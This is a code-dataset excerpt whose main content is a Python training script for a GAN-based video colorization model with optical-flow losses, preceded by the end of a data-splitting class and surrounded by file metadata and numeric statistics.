testing_y = y_list[int((train_ratio + valid_ratio) * N):]
if os.path.exists(self.expdata_dir) is False:
os.makedirs(self.expdata_dir)
pickle.dump(training_x, open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
pickle.dump(validing_x, open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
pickle.dump(testing_x, open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
print ('finished X generate')
pickle.dump(training_y, open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
pickle.dump(validing_y, open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
pickle.dump(testing_y, open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
print ('finished Y generate')
expdata_statistic = {
'task':self.sel_task,
'raio': split_ratio,
'label_n': label_n,
'len_train': len(training_x),
'len_valid': len(validing_x),
'len_test': len(testing_x)
}
pickle.dump(expdata_statistic, open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
print('generate finished')
print('target Task:', expdata_statistic['task'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def load_exp_data(self):
if os.path.exists(self.expdata_dir) is False:
raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
training_x = pickle.load(open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
validing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
testing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
training_y = pickle.load(open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
validing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
testing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
expdata_statistic = pickle.load(open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
label_n = expdata_statistic['label_n']
self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
print('load finished')
print('target Task:', expdata_statistic['task'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def show_data(self, k=3):
"""
Parameters
----------
k : int, optional (default=3)
fetch k sample data for show
"""
print('------------Train--------------')
print('x_data', self.train['x'][:k])
print('y_data', self.train['y'][:k])
print('------------Valid--------------')
print('x_data', self.valid['x'][:k])
print('y_data', self.valid['y'][:k])
print('------------Test--------------')
print('x_data', self.test['x'][:k])
print('y_data', self.test['y'][:k])
if __name__ == '__main__':
print ('hello world')
test_txt = textdata('test.1.text')
test_txt.get_exp_data(sel_task='diagnose',data_root = './datasets/text')
test_txt.load_exp_data()
| 37.210399
| 102
| 0.547525
| 3,989
| 30,773
| 3.987215
| 0.042617
| 0.067777
| 0.072179
| 0.058095
| 0.954165
| 0.951713
| 0.945552
| 0.944169
| 0.942911
| 0.936184
| 0
| 0.006781
| 0.300296
| 30,773
| 827
| 103
| 37.210399
| 0.731887
| 0.102135
| 0
| 0.884477
| 0
| 0
| 0.142078
| 0.020163
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028881
| false
| 0
| 0.019856
| 0
| 0.055957
| 0.189531
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c7e189e6773746fd1d80a363f8e5b716329bbc27
| 31,010
|
py
|
Python
|
trainer.py
|
Sheroa/Video_Colorization
|
5c772ac0ec944814cd8be0a94b0746116b11ac01
|
[
"MIT"
] | null | null | null |
trainer.py
|
Sheroa/Video_Colorization
|
5c772ac0ec944814cd8be0a94b0746116b11ac01
|
[
"MIT"
] | null | null | null |
trainer.py
|
Sheroa/Video_Colorization
|
5c772ac0ec944814cd8be0a94b0746116b11ac01
|
[
"MIT"
] | null | null | null |
import time
import datetime
import itertools
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.autograd as autograd
from torch.utils.data import DataLoader
import torch.backends.cudnn as cudnn
import dataset
import utils
import sys
import networks.pwcnet as pwcnet
def Train_single(opt):
# ----------------------------------------
# Network training parameters
# ----------------------------------------
# cudnn benchmark
cudnn.benchmark = opt.cudnn_benchmark
# Loss functions
criterion_L1 = torch.nn.L1Loss().cuda()
criterion_MSE = torch.nn.MSELoss().cuda()
# Initialize Generator
generatorNet = utils.create_generator(opt)
discriminator = utils.create_discriminator(opt)
# To device
if opt.multi_gpu:
generatorNet = nn.DataParallel(generatorNet)
generatorNet = generatorNet.cuda()
discriminator = nn.DataParallel(discriminator)
discriminator = discriminator.cuda()
else:
discriminator = discriminator.cuda()
generatorNet = generatorNet.cuda()
# Optimizers
optimizer_G = torch.optim.Adam(generatorNet.parameters(), lr = opt.lr_g, betas = (opt.b1, opt.b2), weight_decay = opt.weight_decay)
optimizer_D = torch.optim.Adam(discriminator.parameters(), lr = opt.lr_d, betas = (opt.b1, opt.b2))
# Learning rate decrease
def adjust_learning_rate(opt, epoch, iteration, optimizer):
#Set the learning rate to the initial LR decayed by "lr_decrease_factor" every "lr_decrease_epoch" epochs
if opt.lr_decrease_mode == 'epoch':
lr = opt.lr_g * (opt.lr_decrease_factor ** (epoch // opt.lr_decrease_epoch))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if opt.lr_decrease_mode == 'iter':
lr = opt.lr_g * (opt.lr_decrease_factor ** (iteration // opt.lr_decrease_iter))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
# Save the model if pre_train == True
def save_model(opt, epoch, iteration, len_dataset, generator):
"""Save the model at "checkpoint_interval" and its multiple"""
if opt.multi_gpu == True:
if opt.save_mode == 'epoch':
if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
if opt.save_name_mode:
torch.save(generator.module, 'Pre_%s_epoch%d_bs%d.pth' % (opt.task, epoch, opt.batch_size))
print('The trained model is successfully saved at epoch %d' % (epoch))
if opt.save_mode == 'iter':
if iteration % opt.save_by_iter == 0:
if opt.save_name_mode:
torch.save(generator.module, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
print('The trained model is successfully saved at iteration %d' % (iteration))
else:
if opt.save_mode == 'epoch':
if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
if opt.save_name_mode:
torch.save(generator, 'Pre_%s_epoch%d_bs%d.pth' % (opt.task, epoch, opt.batch_size))
print('The trained model is successfully saved at epoch %d' % (epoch))
if opt.save_mode == 'iter':
if iteration % opt.save_by_iter == 0:
if opt.save_name_mode:
torch.save(generator, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
print('The trained model is successfully saved at iteration %d' % (iteration))
# ----------------------------------------
# Network dataset
# ----------------------------------------
# Define the class list
imglist = utils.text_readlines('ILSVRC2012_train_sal_name.txt')[:1272480]
# Define the dataset
trainset = dataset.ColorizationDataset(opt, imglist)
print('The overall number of classes:', len(trainset))
# Define the dataloader
dataloader = DataLoader(trainset, batch_size = opt.batch_size, shuffle = True, num_workers = opt.num_workers, pin_memory = True)
# ----------------------------------------
# Training
# ----------------------------------------
# Tensor type
Tensor = torch.cuda.FloatTensor
# Count start time
prev_time = time.time()
# For loop training
# For loop training
for epoch in range(opt.epochs):
for iteration, (x_t, y_t) in enumerate(dataloader):
# Train Generator
optimizer_G.zero_grad()
optimizer_D.zero_grad()
lstm_state = None
x_t = x_t.cuda()
y_t = y_t.cuda()
valid = Tensor(np.ones((x_t.shape[0], 1, 30, 30)))
fake = Tensor(np.zeros((x_t.shape[0], 1, 30, 30)))
p_t_last = torch.zeros(opt.batch_size, opt.out_channels, opt.resize_h, opt.resize_w).cuda()
# Train Discriminator
# Generator output
p_t, lstm_state = generatorNet(x_t, p_t_last, lstm_state)
# Fake samples
fake_scalar = discriminator(x_t, p_t.detach())
loss_fake = criterion_MSE(fake_scalar, fake)
# True samples
true_scalar = discriminator(x_t, y_t)
loss_true = criterion_MSE(true_scalar, valid)
# Overall Loss and optimize
loss_D = 0.5 * (loss_fake + loss_true)
# Train Generator
# GAN Loss
fake_scalar = discriminator(x_t, p_t)
loss_G = criterion_MSE(fake_scalar, valid)
# Pixel-level loss
loss_L1 = criterion_L1(p_t, y_t)
# Overall Loss and optimize
loss = loss_L1 + opt.lambda_gan * loss_G
loss.backward()
loss_D.backward()
optimizer_G.step()
optimizer_D.step()
# Determine approximate time left
iters_done = epoch * len(dataloader) + iteration
iters_left = opt.epochs * len(dataloader) - iters_done
time_left = datetime.timedelta(seconds = iters_left * (time.time() - prev_time))
prev_time = time.time()
# Print log
print("\r[Epoch %d/%d] [Batch %d/%d] [L1 Loss: %.4f] [G Loss: %.4f] [D Loss: %.4f] Time_left: %s" %
((epoch + 1), opt.epochs, iteration, len(dataloader), loss_L1.item(), loss_G.item(), loss_D.item(), time_left))
# Save model at certain epochs or iterations
save_model(opt, (epoch + 1), (iters_done + 1), len(dataloader), generatorNet)
# Learning rate decrease at certain epochs
adjust_learning_rate(opt, (epoch + 1), (iters_done + 1), optimizer_G)
adjust_learning_rate(opt, (epoch + 1), (iters_done + 1), optimizer_D)
def Pre_train_single(opt):
# ----------------------------------------
# Network training parameters
# ----------------------------------------
print("Pre_train_single")
# cudnn benchmark
cudnn.benchmark = opt.cudnn_benchmark
# Loss functions
criterion_L1 = torch.nn.L1Loss().cuda()
criterion_MSE = torch.nn.MSELoss().cuda()
# Initialize Generator
generatorNet = utils.create_generator(opt)
# To device
if opt.multi_gpu:
generatorNet = nn.DataParallel(generatorNet)
generatorNet = generatorNet.cuda()
else:
generatorNet = generatorNet.cuda()
# Optimizers
optimizer_G = torch.optim.Adam(generatorNet.parameters(), lr = opt.lr_g, betas = (opt.b1, opt.b2), weight_decay = opt.weight_decay)
# Learning rate decrease
def adjust_learning_rate(opt, epoch, iteration, optimizer):
#Set the learning rate to the initial LR decayed by "lr_decrease_factor" every "lr_decrease_epoch" epochs
if opt.lr_decrease_mode == 'epoch':
lr = opt.lr_g * (opt.lr_decrease_factor ** (epoch // opt.lr_decrease_epoch))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if opt.lr_decrease_mode == 'iter':
lr = opt.lr_g * (opt.lr_decrease_factor ** (iteration // opt.lr_decrease_iter))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
# Save the model if pre_train == True
def save_model(opt, epoch, iteration, len_dataset, generator):
"""Save the model at "checkpoint_interval" and its multiple"""
if opt.multi_gpu == True:
if opt.save_mode == 'epoch':
if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
if opt.save_name_mode:
torch.save(generator.module, 'Pre_%s_epoch%d_bs%d.pth' % (opt.task, epoch, opt.batch_size))
print('The trained model is successfully saved at epoch %d' % (epoch))
if opt.save_mode == 'iter':
if iteration % opt.save_by_iter == 0:
if opt.save_name_mode:
torch.save(generator.module, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
print('The trained model is successfully saved at iteration %d' % (iteration))
else:
if opt.save_mode == 'epoch':
if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
if opt.save_name_mode:
torch.save(generator, 'Pre_%s_epoch%d_bs%d.pth' % (opt.task, epoch, opt.batch_size))
print('The trained model is successfully saved at epoch %d' % (epoch))
if opt.save_mode == 'iter':
if iteration % opt.save_by_iter == 0:
if opt.save_name_mode:
torch.save(generator, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
print('The trained model is successfully saved at iteration %d' % (iteration))
# ----------------------------------------
# Network dataset
# ----------------------------------------
# Define the class list
imglist = utils.text_readlines('ILSVRC2012_train_sal_name.txt')[:1272480]
# Define the dataset
trainset = dataset.ColorizationDataset(opt, imglist)
print('The overall number of classes:', len(trainset))
# Define the dataloader
dataloader = DataLoader(trainset, batch_size = opt.batch_size, shuffle = True, num_workers = opt.num_workers, pin_memory = True)
# ----------------------------------------
# Training
# ----------------------------------------
# Tensor type
Tensor = torch.cuda.FloatTensor
# Count start time
prev_time = time.time()
# For loop training
# For loop training
for epoch in range(opt.epochs):
for iteration, (x_t, y_t) in enumerate(dataloader):
# Train Generator
optimizer_G.zero_grad()
lstm_state = None
x_t = x_t.cuda()
y_t = y_t.cuda()
valid = Tensor(np.ones((x_t.shape[0], 1, 30, 30)))
p_t_last = torch.zeros(opt.batch_size, opt.out_channels, opt.resize_h, opt.resize_w).cuda()
# Generator output
p_t, lstm_state = generatorNet(x_t, p_t_last, lstm_state)
# Pixel-level loss
loss_L1 = criterion_L1(p_t, y_t)
# Overall Loss and optimize
loss = loss_L1
loss.backward()
optimizer_G.step()
# Determine approximate time left
iters_done = epoch * len(dataloader) + iteration
iters_left = opt.epochs * len(dataloader) - iters_done
time_left = datetime.timedelta(seconds = iters_left * (time.time() - prev_time))
prev_time = time.time()
# Print log
print("\r[Epoch %d/%d] [Batch %d/%d] [L1 Loss: %.4f] Time_left: %s" %
((epoch + 1), opt.epochs, iteration, len(dataloader), loss_L1.item(), time_left))
# Save model at certain epochs or iterations
save_model(opt, (epoch + 1), (iters_done + 1), len(dataloader), generatorNet)
# Learning rate decrease at certain epochs
adjust_learning_rate(opt, (epoch + 1), (iters_done + 1), optimizer_G)
def Train_GAN(opt):
# ----------------------------------------
# Network training parameters
# ----------------------------------------
# cudnn benchmark
cudnn.benchmark = opt.cudnn_benchmark
# Loss functions
criterion_L1 = torch.nn.L1Loss().cuda()
criterion_MSE = torch.nn.MSELoss().cuda()
# Initialize Generator
generatorNet = utils.create_generator(opt)
discriminator = utils.create_discriminator(opt)
flownet = utils.create_pwcnet(opt)
# To device
if opt.multi_gpu:
generatorNet = nn.DataParallel(generatorNet)
generatorNet = generatorNet.cuda()
discriminator = nn.DataParallel(discriminator)
discriminator = discriminator.cuda()
flownet = nn.DataParallel(flownet)
flownet = flownet.cuda()
else:
discriminator = discriminator.cuda()
generatorNet = generatorNet.cuda()
flownet = flownet.cuda()
# Optimizers
optimizer_G = torch.optim.Adam(generatorNet.parameters(), lr = opt.lr_g, betas = (opt.b1, opt.b2), weight_decay = opt.weight_decay)
optimizer_D = torch.optim.Adam(discriminator.parameters(), lr = opt.lr_d, betas = (opt.b1, opt.b2))
# Learning rate decrease
def adjust_learning_rate(opt, epoch, iteration, optimizer):
#Set the learning rate to the initial LR decayed by "lr_decrease_factor" every "lr_decrease_epoch" epochs
if opt.lr_decrease_mode == 'epoch':
lr = opt.lr_g * (opt.lr_decrease_factor ** (epoch // opt.lr_decrease_epoch))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if opt.lr_decrease_mode == 'iter':
lr = opt.lr_g * (opt.lr_decrease_factor ** (iteration // opt.lr_decrease_iter))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
# Save the model if pre_train == True
def save_model(opt, epoch, iteration, len_dataset, generator):
"""Save the model at "checkpoint_interval" and its multiple"""
if opt.multi_gpu == True:
if opt.save_mode == 'epoch':
if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
if opt.save_name_mode:
torch.save(generator.module, 'Pre_%s_epoch%d_bs%d_Gan%d_os%d_ol%d.pth' % (opt.task, epoch, opt.batch_size, opt.lambda_gan, opt.lambda_flow, opt.lambda_flow_long))
print('The trained model is successfully saved at epoch %d' % (epoch))
if opt.save_mode == 'iter':
if iteration % opt.save_by_iter == 0:
if opt.save_name_mode:
torch.save(generator.module, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
print('The trained model is successfully saved at iteration %d' % (iteration))
else:
if opt.save_mode == 'epoch':
if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
if opt.save_name_mode:
torch.save(generator, 'Pre_%s_epoch%d_bs%d_GAN%d_os%d_ol%d.pth' % (opt.task, epoch, opt.batch_size, opt.lambda_gan, opt.lambda_flow, opt.lambda_flow_long))
print('The trained model is successfully saved at epoch %d' % (epoch))
if opt.save_mode == 'iter':
if iteration % opt.save_by_iter == 0:
if opt.save_name_mode:
torch.save(generator, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
print('The trained model is successfully saved at iteration %d' % (iteration))
# ----------------------------------------
# Network dataset
# ----------------------------------------
# Define the class list
imglist = utils.text_readlines('videocolor_linux.txt')
classlist = utils.get_dirs(opt.baseroot)
'''
imgnumber = len(imglist) - (len(imglist) % opt.batch_size)
imglist = imglist[:imgnumber]
'''
# Define the dataset
trainset = dataset.MultiFramesDataset(opt, imglist, classlist)
print('The overall number of classes:', len(trainset))
# Define the dataloader
dataloader = utils.create_dataloader(trainset, opt)
# ----------------------------------------
# Training
# ----------------------------------------
# Tensor type
Tensor = torch.cuda.FloatTensor
# Count start time
prev_time = time.time()
# For loop training
for epoch in range(opt.epochs):
for iteration, (in_part, out_part) in enumerate(dataloader):
# Train Generator
optimizer_G.zero_grad()
optimizer_D.zero_grad()
lstm_state = None
loss_flow = 0
loss_flow_long = 0
loss_L1 = 0
loss_D = 0
loss_G = 0
x_0 = in_part[0].cuda()
p_t_0 = in_part[0].cuda()
# Adversarial ground truth
valid = Tensor(np.ones((in_part[0].shape[0], 1, 30, 30)))
fake = Tensor(np.zeros((in_part[0].shape[0], 1, 30, 30)))
for iter_frame in range(opt.iter_frames):
# Read data
x_t = in_part[iter_frame].cuda()
y_t = out_part[iter_frame].cuda()
# Initialize the second input and compute flow loss
if iter_frame == 0:
p_t_last = torch.zeros(opt.batch_size, opt.out_channels, opt.resize_h, opt.resize_w).cuda()
elif iter_frame == 1:
x_t_last = in_part[iter_frame - 1].cuda()
p_t_last = p_t.detach()
p_t_0 = p_t.detach()
p_t_last.requires_grad = False
p_t_0.requires_grad = False
# o_t_last_2_t range is [-20, +20]
o_t_last_2_t = pwcnet.PWCEstimate(flownet, x_t, x_t_last)
x_t_warp = pwcnet.PWCNetBackward((x_t_last + 1) / 2, o_t_last_2_t)
# y_t_warp range is [0, 1]
p_t_warp = pwcnet.PWCNetBackward((p_t_last + 1) / 2, o_t_last_2_t)
else:
x_t_last = in_part[iter_frame - 1].cuda()
p_t_last = p_t.detach()
p_t_last.requires_grad = False
# o_t_last_2_t o_t_first_2_t range is [-20, +20]
o_t_last_2_t = pwcnet.PWCEstimate(flownet, x_t, x_t_last)
o_t_first_2_t = pwcnet.PWCEstimate(flownet,x_t, x_0)
# y_t_warp, y_t_warp_long range is [0, 1]
x_t_warp = pwcnet.PWCNetBackward((x_t_last + 1) / 2, o_t_last_2_t)
p_t_warp = pwcnet.PWCNetBackward((p_t_last + 1) / 2, o_t_last_2_t)
x_t_warp_long = pwcnet.PWCNetBackward((x_0 + 1) / 2, o_t_first_2_t)
p_t_warp_long = pwcnet.PWCNetBackward((p_t_0 + 1) / 2, o_t_first_2_t)
# Generator output
p_t, lstm_state = generatorNet(x_t, p_t_last, lstm_state)
lstm_state = utils.repackage_hidden(lstm_state)
if iter_frame == 1:
mask_flow = torch.exp( -opt.mask_para * torch.sum((x_t + 1) / 2 - x_t_warp, dim=1).pow(2) ).unsqueeze(1)
loss_flow += criterion_L1(mask_flow * (p_t + 1) / 2, mask_flow * p_t_warp)
elif iter_frame > 1:
mask_flow = torch.exp( -opt.mask_para * torch.sum((x_t + 1) / 2 - x_t_warp, dim=1).pow(2) ).unsqueeze(1)
loss_flow += criterion_L1(mask_flow * (p_t + 1) / 2, mask_flow * p_t_warp)
mask_flow_long = torch.exp( -opt.mask_para * torch.sum((x_t + 1) / 2 - x_t_warp_long, dim=1).pow(2) ).unsqueeze(1)
loss_flow_long += criterion_L1(mask_flow_long * (p_t + 1) / 2, mask_flow_long * p_t_warp_long)
# Fake samples
fake_scalar = discriminator(x_t, p_t.detach())
loss_fake = criterion_MSE(fake_scalar, fake)
# True samples
true_scalar = discriminator(x_t, y_t)
loss_true = criterion_MSE(true_scalar, valid)
# Train Discriminator
loss_D += 0.5 * (loss_fake + loss_true)
# Train Generator
# GAN Loss
fake_scalar = discriminator(x_t, p_t)
loss_G += criterion_MSE(fake_scalar, valid)
# Pixel-level loss
loss_L1 += criterion_L1(p_t, y_t)
# Overall Loss and optimize
loss = loss_L1 + opt.lambda_flow * loss_flow + opt.lambda_flow_long * loss_flow_long + opt.lambda_gan * loss_G
loss.backward()
loss_D.backward()
optimizer_G.step()
optimizer_D.step()
# Determine approximate time left
iters_done = epoch * len(dataloader) + iteration
iters_left = opt.epochs * len(dataloader) - iters_done
time_left = datetime.timedelta(seconds = iters_left * (time.time() - prev_time))
prev_time = time.time()
# Print log
print("\r[Epoch %d/%d] [Batch %d/%d] [L1 Loss: %.4f] [Flow Loss Short: %.8f] [Flow Loss Long: %.8f] [G Loss: %.4f] [D Loss: %.4f] Time_left: %s" %
((epoch + 1), opt.epochs, iteration, len(dataloader), loss_L1.item(), loss_flow.item(), loss_flow_long.item(), loss_G.item(), loss_D.item(), time_left))
# Save model at certain epochs or iterations
save_model(opt, (epoch + 1), (iters_done + 1), len(dataloader), generatorNet)
# Learning rate decrease at certain epochs
adjust_learning_rate(opt, (epoch + 1), (iters_done + 1), optimizer_G)
adjust_learning_rate(opt, (epoch + 1), (iters_done + 1), optimizer_D)
def Train_No_GAN(opt): # w / o GAN
# ----------------------------------------
# Network training parameters
# ----------------------------------------
# cudnn benchmark
cudnn.benchmark = opt.cudnn_benchmark
# Loss functions
criterion_L1 = torch.nn.L1Loss().cuda()
# Initialize Generator
generatorNet = utils.create_generator(opt)
flownet = utils.create_pwcnet(opt)
# To device
if opt.multi_gpu:
generatorNet = nn.DataParallel(generatorNet)
generatorNet = generatorNet.cuda()
flownet = nn.DataParallel(flownet)
flownet = flownet.cuda()
else:
generatorNet = generatorNet.cuda()
flownet = flownet.cuda()
# Optimizers
optimizer_G = torch.optim.Adam(generatorNet.parameters(), lr = opt.lr_g, betas = (opt.b1, opt.b2), weight_decay = opt.weight_decay)
# Learning rate decrease
def adjust_learning_rate(opt, epoch, iteration, optimizer):
#Set the learning rate to the initial LR decayed by "lr_decrease_factor" every "lr_decrease_epoch" epochs
if opt.lr_decrease_mode == 'epoch':
lr = opt.lr_g * (opt.lr_decrease_factor ** (epoch // opt.lr_decrease_epoch))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if opt.lr_decrease_mode == 'iter':
lr = opt.lr_g * (opt.lr_decrease_factor ** (iteration // opt.lr_decrease_iter))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
# Save the model if pre_train == True
def save_model(opt, epoch, iteration, len_dataset, generator):
"""Save the model at "checkpoint_interval" and its multiple"""
if opt.multi_gpu == True:
if opt.save_mode == 'epoch':
if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
if opt.save_name_mode:
torch.save(generator.module, 'Pre_%s_epoch%d_bs%d.pth' % (opt.task, epoch, opt.batch_size))
print('The trained model is successfully saved at epoch %d' % (epoch))
if opt.save_mode == 'iter':
if iteration % opt.save_by_iter == 0:
if opt.save_name_mode:
torch.save(generator.module, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
print('The trained model is successfully saved at iteration %d' % (iteration))
else:
if opt.save_mode == 'epoch':
if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
if opt.save_name_mode:
torch.save(generator, 'Pre_%s_epoch%d_bs%d.pth' % (opt.task, epoch, opt.batch_size))
print('The trained model is successfully saved at epoch %d' % (epoch))
if opt.save_mode == 'iter':
if iteration % opt.save_by_iter == 0:
if opt.save_name_mode:
torch.save(generator, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
print('The trained model is successfully saved at iteration %d' % (iteration))
# ----------------------------------------
# Network dataset
# ----------------------------------------
# Define the class list
imglist = utils.text_readlines('videocolor_linux.txt')
classlist = utils.get_dirs(opt.baseroot)
'''
imgnumber = len(imglist) - (len(imglist) % opt.batch_size)
imglist = imglist[:imgnumber]
'''
# Define the dataset
trainset = dataset.MultiFramesDataset(opt, imglist, classlist)
print('The overall number of classes:', len(trainset))
# Define the dataloader
dataloader = utils.create_dataloader(trainset, opt)
# ----------------------------------------
# Training
# ----------------------------------------
# Count start time
prev_time = time.time()
# For loop training
for epoch in range(opt.epochs):
for iteration, (in_part, out_part) in enumerate(dataloader):
# Train Generator
optimizer_G.zero_grad()
lstm_state = None
loss_flow = 0
loss_flow_long = 0
loss_L1 = 0
x_0 = in_part[0].cuda()
p_t_0 = in_part[0].cuda()
for iter_frame in range(opt.iter_frames):
# Read data
x_t = in_part[iter_frame].cuda()
y_t = out_part[iter_frame].cuda()
# Initialize the second input and compute flow loss
if iter_frame == 0:
p_t_last = torch.zeros(opt.batch_size, opt.out_channels, opt.resize_h, opt.resize_w).cuda()
elif iter_frame == 1:
x_t_last = in_part[iter_frame - 1].cuda()
p_t_last = p_t.detach()
p_t_0 = p_t.detach()
p_t_last.requires_grad = False
p_t_0.requires_grad = False
# o_t_last_2_t range is [-20, +20]
o_t_last_2_t = pwcnet.PWCEstimate(flownet, x_t, x_t_last)
x_t_warp = pwcnet.PWCNetBackward((x_t_last + 1) / 2, o_t_last_2_t)
# y_t_warp range is [0, 1]
p_t_warp = pwcnet.PWCNetBackward((p_t_last + 1) / 2, o_t_last_2_t)
else:
x_t_last = in_part[iter_frame - 1].cuda()
p_t_last = p_t.detach()
p_t_last.requires_grad = False
# o_t_last_2_t o_t_first_2_t range is [-20, +20]
o_t_last_2_t = pwcnet.PWCEstimate(flownet, x_t, x_t_last)
o_t_first_2_t = pwcnet.PWCEstimate(flownet,x_t, x_0)
# y_t_warp, y_t_warp_long range is [0, 1]
x_t_warp = pwcnet.PWCNetBackward((x_t_last + 1) / 2, o_t_last_2_t)
p_t_warp = pwcnet.PWCNetBackward((p_t_last + 1) / 2, o_t_last_2_t)
x_t_warp_long = pwcnet.PWCNetBackward((x_0 + 1) / 2, o_t_first_2_t)
p_t_warp_long = pwcnet.PWCNetBackward((p_t_0 + 1) / 2, o_t_first_2_t)
# Generator output
p_t, lstm_state = generatorNet(x_t, p_t_last, lstm_state)
lstm_state = utils.repackage_hidden(lstm_state)
if iter_frame == 1:
mask_flow = torch.exp( -opt.mask_para * torch.sum((x_t + 1) / 2 - x_t_warp, dim=1).pow(2) ).unsqueeze(1)
loss_flow += criterion_L1(mask_flow * (p_t + 1) / 2, mask_flow * p_t_warp)
elif iter_frame > 1:
mask_flow = torch.exp( -opt.mask_para * torch.sum((x_t + 1) / 2 - x_t_warp, dim=1).pow(2) ).unsqueeze(1)
loss_flow += criterion_L1(mask_flow * (p_t + 1) / 2, mask_flow * p_t_warp)
mask_flow_long = torch.exp( -opt.mask_para * torch.sum((x_t + 1) / 2 - x_t_warp_long, dim=1).pow(2) ).unsqueeze(1)
loss_flow_long += criterion_L1(mask_flow_long * (p_t + 1) / 2, mask_flow_long * p_t_warp_long)
# Pixel-level loss
loss_L1 += criterion_L1(p_t, y_t)
# Overall Loss and optimize
loss = loss_L1 + opt.lambda_flow * loss_flow + opt.lambda_flow_long * loss_flow_long
loss.backward()
optimizer_G.step()
# Determine approximate time left
iters_done = epoch * len(dataloader) + iteration
iters_left = opt.epochs * len(dataloader) - iters_done
time_left = datetime.timedelta(seconds = iters_left * (time.time() - prev_time))
prev_time = time.time()
# Print log
print("\r[Epoch %d/%d] [Batch %d/%d] [L1 Loss: %.4f] [Flow Loss Short: %.8f] [Flow Loss Long: %.8f] Time_left: %s" %
((epoch + 1), opt.epochs, iteration, len(dataloader), loss_L1.item(), loss_flow.item(), loss_flow_long.item(), time_left))
# Save model at certain epochs or iterations
save_model(opt, (epoch + 1), (iters_done + 1), len(dataloader), generatorNet)
# Learning rate decrease at certain epochs
adjust_learning_rate(opt, (epoch + 1), (iters_done + 1), optimizer_G)
| 45.336257
| 186
| 0.559723
| 3,873
| 31,010
| 4.226439
| 0.059385
| 0.00782
| 0.017594
| 0.012707
| 0.975075
| 0.973486
| 0.970432
| 0.970432
| 0.961879
| 0.953021
| 0
| 0.01484
| 0.308965
| 31,010
| 684
| 187
| 45.336257
| 0.749032
| 0.141535
| 0
| 0.897059
| 0
| 0.009804
| 0.075774
| 0.017152
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0
| 0.034314
| 0
| 0.063725
| 0.061275
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1bfce171449b5e7ea033125f3988357e625d424b
| 17,121
|
py
|
Python
|
indy_common/test/auth/metadata/test_auth_rule_with_metadata_simple.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 627
|
2017-07-06T12:38:08.000Z
|
2022-03-30T13:18:43.000Z
|
indy_common/test/auth/metadata/test_auth_rule_with_metadata_simple.py
|
Rob-S/indy-node
|
